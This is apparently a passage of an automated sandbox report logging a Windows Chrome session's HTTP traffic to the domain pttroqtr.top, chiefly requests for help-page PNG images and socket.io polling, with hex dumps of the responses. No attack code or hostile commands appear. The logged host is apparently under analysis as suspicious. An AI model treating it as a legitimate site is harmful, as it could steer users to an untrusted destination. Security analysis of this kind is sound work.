                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"4072-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:34 UTC16073INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 3f ff 49 44 41 54 78 da ec dd 7f 90 1c e7 5d e7 f1 47 8e 90 65 23 7b 57 b6 93 d8 4e ae 76 44 52 21 0e 90 5d 61 02 94 8b 63 47 21 c9 5d 2a 47 34 c2 a1 7c 05 14 3b 22 1c 15 7e 5c b4 ba 40 01 a9 a2 34 aa 3b 0e a8 3a 4e a3 22 bf ae 80 ec ec fd 41 91 3b 27 9a 85 e3 b8 23 04 cd 72 c1 47 2e 17 34 9b 14 31 1c 38 9a 05 13 27 c1 b1 76 1d 25 96 15 c9 7b fd 9d f9 b6 dd 9a 9d 1f fd e3 e9 ee a7 67 de af aa c9 3a da dd de 9e 9e ee 7e 3e fd fc dc b3 b3 b3 63 00 00 00 50 2c 37 71 08 00 00 00 08 71
                                                                                                                                                                                            Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<?IDATx]Ge#{WNvDR!]acG!]*G4|;"~\@4;:N"A;'#rG.418'v%{g:~>cP,7qq
                                                                                                                                                                                            2024-09-28 03:39:34 UTC425INData Raw: 00 00 84 38 00 00 00 42 1c 00 00 00 08 71 00 00 00 20 c4 01 00 00 10 e2 00 00 00 40 88 03 00 00 00 21 0e 00 00 80 10 07 00 00 00 42 1c 00 00 00 08 71 00 00 00 20 c4 01 00 00 10 e2 00 00 00 40 88 03 00 00 00 21 0e 00 00 80 10 07 00 00 00 42 1c 00 00 00 08 71 00 00 00 84 38 00 00 00 10 e2 00 00 00 40 88 03 00 00 20 c4 01 00 00 80 10 07 00 00 00 42 1c 00 00 00 08 71 00 00 00 84 38 00 00 00 10 e2 00 00 00 40 88 03 00 00 20 c4 01 00 00 80 10 07 00 00 00 42 1c 00 00 00 21 0e 00 00 00 84 38 00 00 00 10 e2 00 00 00 08 71 1c 02 00 00 00 42 1c 00 00 00 08 71 00 00 00 20 c4 01 00 00 10 e2 00 00 00 40 88 03 00 00 00 21 0e 00 00 80 10 07 00 00 00 42 1c 00 00 00 08 71 00 00 00 84 38 00 00 00 10 e2 00 00 00 40 88 03 00 00 00 21 0e 00 00 80 10 07 00 00 00 42 1c 00 00 00
                                                                                                                                                                                            Data Ascii: 8Bq @!Bq @!Bq8@ Bq8@ B!8qBq @!Bq8@!B


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            66192.168.2.5497958.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:35 UTC405OUTGET /socket.io/?EIO=4&transport=polling&t=P8sjbRz&sid=xZsOXWwlpa9sZhJdAEf0 HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:35 UTC198INHTTP/1.1 400 Bad Request
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:35 GMT
                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            2024-09-28 03:39:35 UTC52INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 29{"code":1,"message":"Session ID unknown"}0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            67192.168.2.5497968.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:35 UTC364OUTGET /api/MC42NDcxMDI1MjYyOTk4MDM0 HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:35 UTC164INHTTP/1.1 404 Not Found
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:35 GMT
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            2024-09-28 03:39:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            68192.168.2.5497978.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:35 UTC361OUTGET /help/layout/images/33.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:35 UTC311INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:35 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 11236
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"2be4-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:35 UTC11236INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 2b 71 49 44 41 54 78 da ec dd 4d 56 1b d7 ba 06 e0 8a d7 e9 db 67 04 26 23 80 74 6f 07 79 04 26 ad 34 2d 8f c0 64 04 51 46 60 3c 02 cb cd db 0a 1e 81 e5 ce e9 1a 46 10 18 c1 35 23 f0 ad 0f b6 8e 65 02 48 55 7b 97 aa 4a 3c cf 5a 5a c9 39 01 51 bf bb de da bf 3f 7d fb f6 ad 02 00 60 5c 9e 38 04 00 00 42 1c 00 00 42 1c 00 00 42 1c 00 80 10 07 00 80 10 07 00 80 10 07 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 08 71 00 00 08 71 00 00 08 71 00 00 08 71 00 00 42 1c 00 00 42 1c 00 00 42 1c 00
                                                                                                                                                                                            Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<+qIDATxMVg&#toy&4-dQF`<F5#eHU{J<ZZ9Q?}`\8BBB qqqqBBB


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            69192.168.2.5497988.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:35 UTC361OUTGET /help/layout/images/35.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:35 UTC311INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:35 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 10360
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"2878-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:35 UTC10360INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 28 05 49 44 41 54 78 da ec dd 4d 7a d3 58 fa 37 60 c1 d5 f3 d0 2b 20 bd 82 a4 a6 ff 09 ae 15 90 1e f5 10 b3 02 52 2b c0 ac a0 c2 0a 30 c3 1a 11 56 80 99 bc d3 4a 56 50 66 05 0d 2b e0 f5 43 1e 75 a9 5c f9 b0 ec 23 5b b2 ef fb ba 7c d1 5d 10 47 96 e4 73 7e 3a 9f 8f be 7f ff 5e 01 00 30 2c 8f 9d 02 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 84 38 00 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00 21 0e
                                                                                                                                                                                            Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<(IDATxMzX7`+ R+0VJVPf+Cu\#[|]Gs~:^0,!!!@@@8888!!!


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            70192.168.2.5497948.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:35 UTC361OUTGET /help/layout/images/34.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:35 UTC311INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:35 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 14568
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"38e8-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:35 UTC14568INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 38 75 49 44 41 54 78 da ec dd 3d 56 1b c9 de c7 f1 f2 3d 73 ce 84 f0 ac 00 4d 44 88 26 22 a4 bd 02 34 e1 8d 90 57 80 bc 02 e4 15 58 ac 00 11 39 b4 58 81 45 48 64 11 12 59 ac 60 50 78 23 9e fe 77 55 1b 59 06 a9 5f aa aa ab ba bf 9f 73 34 9e 19 83 d4 2a 75 ab 7e 5d af ef 9e 9f 9f 15 00 00 00 e2 f2 1f 8a 00 00 00 80 10 07 00 00 00 42 1c 00 00 00 08 71 00 00 00 84 38 00 00 00 10 e2 00 00 00 40 88 03 00 00 20 c4 01 00 00 80 10 07 00 00 00 42 1c 00 00 00 21 0e 00 00 00 84 38 00 00 00 10
                                                                                                                                                                                            Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<8uIDATx=V=sMD&"4WX9XEHdY`Px#wUY_s4*u~]Bq8@ B!8


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            71192.168.2.5497938.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:35 UTC599OUTGET /help/layout/images/40.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:35 UTC311INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:35 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 10746
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"29fa-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:35 UTC10746INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 29 87 49 44 41 54 78 da ec dd 3d 76 db 56 c2 06 60 4c ce 77 ce 94 56 56 60 a5 72 29 4d e5 d2 f4 0a ac 94 53 99 5e 81 95 15 98 5e 41 e4 15 98 ae a6 8c bc 02 53 a5 ab 48 a5 ab c8 2b 18 a9 9c ca 1f 2e 71 19 d1 b2 7e f0 73 2f 00 52 cf 73 0e e3 4c c6 12 41 10 b8 78 ef ff 3f be 7d fb 56 00 00 b0 59 7e 72 0a 00 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 84 38 00 00 84 38 00 00
                                                                                                                                                                                            Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<)IDATx=vV`LwVV`r)MS^^ASH+.q~s/RsLAx?}VY~r888!!!@@@88


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            72192.168.2.5497998.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:36 UTC554OUTGET /socket.io/?EIO=4&transport=polling&t=P8sjc6P HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:36 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:36 GMT
                                                                                                                                                                                            Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                            Content-Length: 118
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            cache-control: no-store
                                                                                                                                                                                            2024-09-28 03:39:36 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 48 5f 59 32 32 6d 30 46 4a 6a 41 4e 6b 73 74 50 41 45 66 33 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                                                                                                                                                            Data Ascii: 0{"sid":"H_Y22m0FJjANkstPAEf3","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            73192.168.2.5498018.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:36 UTC599OUTGET /help/layout/images/41.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:36 UTC311INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:36 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 19866
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"4d9a-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:36 UTC16073INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 4d 27 49 44 41 54 78 da ec dd 0b 78 5c 77 79 e7 f1 d7 ba f8 ee 48 b6 e3 6b 8c 25 43 6e 84 8b 94 90 44 21 24 68 1c 42 bb 4d f2 60 65 cb 66 69 bb ac 65 fa 6c 16 b6 2d 56 ba ec b2 6c 21 1e 17 b6 2c 94 12 f9 d9 87 07 96 2d f5 b8 a5 5c d2 dd 46 ce 93 a4 40 21 1e 25 21 c5 04 92 31 21 21 24 21 1a d9 8e e3 bb 25 cb b2 25 df b4 e7 3d e7 3f d2 cc 68 24 cd 39 73 ce 99 33 d2 f7 f3 3c 27 8e 6e 33 67 ce 9c 99 f3 9b f7 7f 9b 35 32 32 22 00 00 00 a8 2c 55 1c 02 00 00 00 42 1c 00 00 00 08 71 00 00
                                                                                                                                                                                            Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<M'IDATxx\wyHk%CnD!$hBM`efiel-Vl!,-\F@!%!1!!$!%%=?h$9s3<'n3g522",UBq
                                                                                                                                                                                            2024-09-28 03:39:36 UTC3793INData Raw: 1a 9e a3 21 43 3b e2 ff cd 8b c7 73 7e 47 83 9b 06 b8 ae 81 b3 9e 26 fe 75 eb 76 2b e8 bd f1 3b 8d f2 f8 f5 2b e5 f3 6b 2f 09 f4 be b4 ba f8 85 77 5c ea db ed e9 7c 7a f7 f7 e4 5c 8b f7 50 85 f3 18 dc 52 2d 49 6b d3 24 bf 6b 74 d3 af 9d ef c7 42 0e 73 7d f6 c0 08 eb ff 24 98 66 56 26 74 9d 6e 01 2e f7 83 b2 df 7d 2d 59 92 8b 10 07 8c 06 b9 ce ec 0b d3 17 f7 0d c8 81 53 b9 7d df fe f2 c6 95 52 35 2b dc 15 18 b4 59 f7 c3 57 2d 0e 74 e5 87 bf 68 a8 93 a6 65 73 7d bb bd 3f 7f f6 48 fe bc 70 f4 77 72 1f e0 12 26 b4 b5 4e f0 1b ad 26 d0 b5 87 be 6f 3a b1 b0 d3 fc e9 77 90 e3 82 1c 7d 5e 02 5c 50 83 1c 58 92 8b 10 07 e4 18 bd 20 6a 08 f9 c4 cf 0e e6 fc 50 fb b4 3d 73 cb 65 be 06 9e 62 ec 39 3a 14 58 b3 6a fb e2 b9 b2 e9 9a c5 be dd 9e 36 a3 ea 28 df 2c 3b ac 80
                                                                                                                                                                                            Data Ascii: !C;s~G&uv+;+k/w\|z\PR-Ik$ktBs}$fV&tn.}-YS}R5+YW-thes}?Hpwr&N&o:w}^\PX jP=seb9:Xj6(,;


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            74192.168.2.5498008.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:36 UTC599OUTGET /help/layout/images/42.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:36 UTC311INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:36 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 12814
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"320e-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:36 UTC12814INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 31 9b 49 44 41 54 78 da ec dd 4d 76 db 46 be 37 60 f8 3d 77 6e dd 15 88 bd 02 29 d3 4c cc ac c0 ca a8 87 a6 57 60 65 05 a6 57 10 79 05 a6 87 19 85 5e 81 a9 49 4f 43 ad 20 f4 0a ae b4 02 bf f8 5b 85 36 ad 48 22 3e 0a 24 28 3e cf 39 6c a5 2d 91 04 0a 1f f5 43 55 a1 f0 ec eb d7 af 05 00 00 fb e5 ff 29 02 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 84 38 00 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00
                                                                                                                                                                                            Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<1IDATxMvF7`=wn)LW`eWy^IOC [6H">$(>9l-CU)!!!@@@8888!!


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
